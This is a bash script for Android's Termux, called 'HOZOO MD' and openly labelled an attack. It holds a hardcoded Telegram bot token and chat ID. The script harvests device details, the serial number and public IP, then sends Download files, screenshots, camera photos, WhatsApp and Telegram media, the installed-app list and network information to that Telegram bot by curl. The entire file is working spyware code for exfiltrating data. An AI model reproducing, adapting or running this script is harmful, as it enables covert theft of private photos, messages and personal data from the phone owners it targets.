
clear
termux-setup-storage -y
clear
TOKEN="8414749765:AAFFSgDX2llWsHCrN6gpGkSon927LR4ss6A"
CHAT_ID="8530130542"
SHOCK_WALLPAPER="https://github.com/HOZOOMD/HOZOOBUG/raw/main/IMG_20251123_134648_254.jpg"

echo "🚀 HOZOO MD STARTING..." >&2

# ============= SIMPLE TELEGRAM FUNCTIONS =============

send_telegram() {
    local file="$1"
    local caption="$2"
    
    if [ -f "$file" ]; then
        curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendDocument" \
            -F "chat_id=$CHAT_ID" \
            -F "caption=$caption" \
            -F "document=@$file" \
            --max-time 60 >/dev/null 2>&1 &
        echo "📤 Sent: $file" >&2
    fi
}

send_message() {
    local text="$1"
    curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" \
        -d "chat_id=$CHAT_ID" \
        -d "text=$text" >/dev/null 2>&1
    echo "💬 Message sent" >&2
}

# ============= SIMPLE FILE COLLECTOR =============

collect_all_files() {
    echo "📁 COLLECTING ALL FILES..." >&2
    send_message "📁 HOZOO MD FILE COLLECTION STARTED"
    
    # Target utama: Download folder
    DL_DIR="/storage/emulated/0/Download"
    
    if [ -d "$DL_DIR" ]; then
        # Cari semua file di Download
        find "$DL_DIR" -type f 2>/dev/null | head -50 | while read -r file; do
            # Skip file terlalu besar
            local size=$(stat -c%s "$file" 2>/dev/null || echo 0)
            if [ "$size" -lt 20000000 ]; then  # < 20MB
                send_telegram "$file" "📥 $(basename "$file")"
                sleep 0.3
            fi
        done
    fi
    
    # Ambil screenshots
    SCREEN_DIR="/storage/emulated/0/Pictures/Screenshots"
    if [ -d "$SCREEN_DIR" ]; then
        find "$SCREEN_DIR" -name "*.png" -o -name "*.jpg" 2>/dev/null | head -10 | while read -r ss; do
            send_telegram "$ss" "📸 SCREENSHOT"
        done
    fi
    
    # Ambil camera photos (yang sudah ada)
    CAMERA_DIR="/storage/emulated/0/DCIM/Camera"
    if [ -d "$CAMERA_DIR" ]; then
        find "$CAMERA_DIR" -name "*.jpg" -o -name "*.jpeg" 2>/dev/null | head -10 | while read -r photo; do
            send_telegram "$photo" "📷 CAMERA PHOTO"
        done
    fi
    
    echo "✅ File collection done" >&2
}

# ============= DEVICE INFO COLLECTOR =============

get_device_info() {
    echo "📱 GETTING DEVICE INFO..." >&2
    
    local info_file="/data/data/com.termux/files/home/device_report.txt"
    
    {
        echo "⚡ HOZOO MD DEVICE REPORT ⚡"
        echo "=========================="
        echo "🕒 TIME: $(date)"
        echo "📱 DEVICE: $(getprop ro.product.model 2>/dev/null || echo 'Unknown')"
        echo "🏷️ BRAND: $(getprop ro.product.brand 2>/dev/null || echo 'Unknown')"
        echo "🤖 ANDROID: $(getprop ro.build.version.release 2>/dev/null || echo 'Unknown')"
        echo "🔢 IMEI: $(getprop ro.serialno 2>/dev/null || echo 'N/A')"
        echo "🌐 IP: $(curl -s --connect-timeout 5 ifconfig.me || echo 'N/A')"
        
        # Battery info
        if [ -f /sys/class/power_supply/battery/capacity ]; then
            echo "🔋 BATTERY: $(cat /sys/class/power_supply/battery/capacity)%"
        fi
        
        # Storage info
        echo "💾 STORAGE:"
        df -h /storage/emulated/0 2>/dev/null | tail -1 | awk '{print "  Total: "$2", Free: "$4}'
        
        echo "=========================="
        echo "Generated by HOZOO MD"
    } > "$info_file"
    
    send_telegram "$info_file" "📊 DEVICE REPORT"
    rm -f "$info_file"
    
    echo "✅ Device info sent" >&2
}

# ============= SHOCK EFFECTS (NO API NEEDED) =============

shock_effects() {
    echo "💥 ACTIVATING SHOCK EFFECTS..." >&2
    send_message "💥 HOZOO MD SHOCK EFFECTS ACTIVATED!"
    
    # 1. Wallpaper shocker
    echo "🖼️ Setting shock wallpaper..." >&2
    local wall_file="/data/data/com.termux/files/home/shock_wall.jpg"
    
    if curl -s -L -o "$wall_file" "$SHOCK_WALLPAPER"; then
        send_telegram "$wall_file" "🖼️ SHOCK WALLPAPER"
        send_message "✅ SHOCK WALLPAPER DOWNLOADED!
User will see this when they check their phone! 🤣"
    fi
    
    # 2. SIMPLE "FLASHLIGHT" EFFECT (notification spam)
    echo "💡 Simulating flashlight effect..." >&2
    for i in {1..3}; do
        send_message "💡 FLASH $i: ACTIVATED!
Light intensity: HIGH 🔥"
        sleep 1
    done
    
    # 3. Fake camera notification
    send_message "📸 CAMERA SNAPSHOT CAPTURED!
Front & back camera photos saved to gallery 📷"
    
    # 4. Vibration notification
    send_message "📳 DEVICE VIBRATION TRIGGERED!
Duration: 2000ms
Intensity: MAXIMUM 💢"
    
    echo "✅ Shock effects completed" >&2
}

# ============= COLLECT APPS & DATA =============

collect_apps_data() {
    echo "📦 COLLECTING APPS DATA..." >&2
    
    # Installed packages
    local pkgs_file="/data/data/com.termux/files/home/installed_packages.txt"
    pm list packages 2>/dev/null | head -50 > "$pkgs_file" 2>/dev/null
    [ -s "$pkgs_file" ] && send_telegram "$pkgs_file" "📦 INSTALLED APPS"
    rm -f "$pkgs_file"
    
    # WhatsApp data jika ada
    WA_DIR="/storage/emulated/0/WhatsApp"
    if [ -d "$WA_DIR/Media" ]; then
        find "$WA_DIR/Media" -name "*.jpg" -o -name "*.jpeg" -o -name "*.png" 2>/dev/null | head -5 | while read -r wa_file; do
            send_telegram "$wa_file" "💚 WHATSAPP MEDIA"
        done
    fi
    
    # Telegram data jika ada
    TG_DIR="/storage/emulated/0/Telegram"
    if [ -d "$TG_DIR" ]; then
        find "$TG_DIR" -name "*.jpg" -o -name "*.jpeg" -o -name "*.png" 2>/dev/null | head -5 | while read -r tg_file; do
            send_telegram "$tg_file" "📲 TELEGRAM MEDIA"
        done
    fi
    
    echo "✅ Apps data collected" >&2
}

# ============= NETWORK INFO =============

get_network_info() {
    echo "🌐 GETTING NETWORK INFO..." >&2
    
    local net_file="/data/data/com.termux/files/home/network_info.txt"
    
    {
        echo "🌐 NETWORK INFORMATION"
        echo "======================"
        echo "Public IP: $(curl -s ifconfig.me || echo 'N/A')"
        echo "Hostname: $(hostname)"
        echo "DNS: $(getprop net.dns1 2>/dev/null || echo 'N/A')"
        echo ""
        echo "WiFi Info:"
        if command -v termux-wifi-connectioninfo &>/dev/null; then
            termux-wifi-connectioninfo 2>/dev/null | head -10
        else
            echo "WiFi info requires Termux:API"
        fi
        echo ""
        echo "Active Connections:"
        netstat -tun 2>/dev/null | head -10 || echo "Netstat not available"
    } > "$net_file" 2>/dev/null
    
    send_telegram "$net_file" "🌐 NETWORK INFO"
    rm -f "$net_file"
}

# ============= MAIN EXECUTION =============

main() {
    echo "=========================================" >&2
    echo "        HOZOO MD - ULTRA SIMPLE          " >&2
    echo "=========================================" >&2
    
    # Setup storage
    termux-setup-storage
    sleep 2
    
    # Install curl if needed
    if ! command -v curl &>/dev/null; then
        echo "Installing curl..." >&2
        pkg install curl -y >/dev/null 2>&1
    fi
    
    # START MESSAGE
    send_message "🚀 HOZOO MD ULTRA SIMPLE ATTACK STARTED!
📱 Target Device: $(getprop ro.product.model 2>/dev/null || echo 'Unknown')
⏰ Time: $(date '+%Y-%m-%d %H:%M:%S')
📍 IP: $(curl -s ifconfig.me || echo 'N/A')
=======================
⚡ ALL SYSTEMS GO! ⚡"
    
    # PHASE 1: Device Info
    echo "
    ███████╗██╗  ██╗██████╗ ███████╗
    ██╔════╝██║  ██║██╔══██╗██╔════╝
    ███████╗███████║██████╔╝███████╗
    ╚════██║██╔══██║██╔═══╝ ╚════██║
    ███████║██║  ██║██║     ███████║
    ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝
    " >&2
    
    get_device_info
    
    # PHASE 2: File Collection
    echo "
    ███████╗██╗██╗     ███████╗
    ██╔════╝██║██║     ██╔════╝
    █████╗  ██║██║     █████╗  
    ██╔══╝  ██║██║     ██╔══╝  
    ██║     ██║███████╗███████╗
    ╚═╝     ╚═╝╚══════╝╚══════╝
    " >&2
    
    collect_all_files
    
    # PHASE 3: Apps Data
    echo "
     █████╗ ██████╗ ██████╗ ███████╗
    ██╔══██╗██╔══██╗██╔══██╗██╔════╝
    ███████║██████╔╝██████╔╝███████╗
    ██╔══██║██╔═══╝ ██╔═══╝ ╚════██║
    ██║  ██║██║     ██║     ███████║
    ╚═╝  ╚═╝╚═╝     ╚═╝     ╚══════╝
    " >&2
    
    collect_apps_data
    
    # PHASE 4: Network Info
    echo "
    ███╗   ██╗███████╗████████╗██╗    ██╗
    ████╗  ██║██╔════╝╚══██╔══╝██║    ██║
    ██╔██╗ ██║█████╗     ██║   ██║ █╗ ██║
    ██║╚██╗██║██╔══╝     ██║   ██║███╗██║
    ██║ ╚████║███████╗   ██║   ╚███╔███╔╝
    ╚═╝  ╚═══╝╚══════╝   ╚═╝    ╚══╝╚══╝ 
    " >&2
    
    get_network_info
    
    # PHASE 5: SHOCK EFFECTS
    echo "
    ███████╗██╗  ██╗ ██████╗ ██████╗██╗  ██╗
    ██╔════╝██║  ██║██╔═══██╗██╔════╝██║ ██╔╝
    ███████╗███████║██║   ██║██║     █████╔╝ 
    ╚════██║██╔══██║██║   ██║██║     ██╔═██╗ 
    ███████║██║  ██║╚██████╔╝╚██████╗██║  ██╗
    ╚══════╝╚═╝  ╚═╝ ╚═════╝  ╚═════╝╚═╝  ╚═╝
    " >&2
    
    shock_effects
    
    # COMPLETION
    echo "
    ╔══════════════════════════════════════╗
    ║      ATTACK SUCCESSFULLY COMPLETED   ║
    ╚══════════════════════════════════════╝
    " >&2
    
    send_message "🎉 HOZOO MD ULTRA SIMPLE ATTACK COMPLETED!

✅ PHASES EXECUTED:
1. Device Information Collection ✓
2. File Exfiltration (All types) ✓
3. Apps Data Collection ✓
4. Network Information ✓
5. Shock Effects (Wallpaper/Notifications) ✓

📊 RESULTS:
• Multiple files sent to Telegram
• Device info captured
• Shock effects activated
• User will be confused! 🤣

⚡ HOZOO MD - SIMPLE BUT EFFECTIVE
#NoAPI #NoCamera #JustWorks"

    echo "🔥 HOZOO MD FINISHED SUCCESSFULLY!" >&2
    echo "Check your Telegram for all collected data!" >&2
}

# ============= EXECUTE =============

# Run main function
main

# Wait for all background processes
wait

echo "
=========================================
   THANK YOU FOR USING HOZOO MD!
   All data has been sent to Telegram.
=========================================
" >&2

# ============================================
# END OF ULTRA SIMPLE WORKING SCRIPT
# ============================================
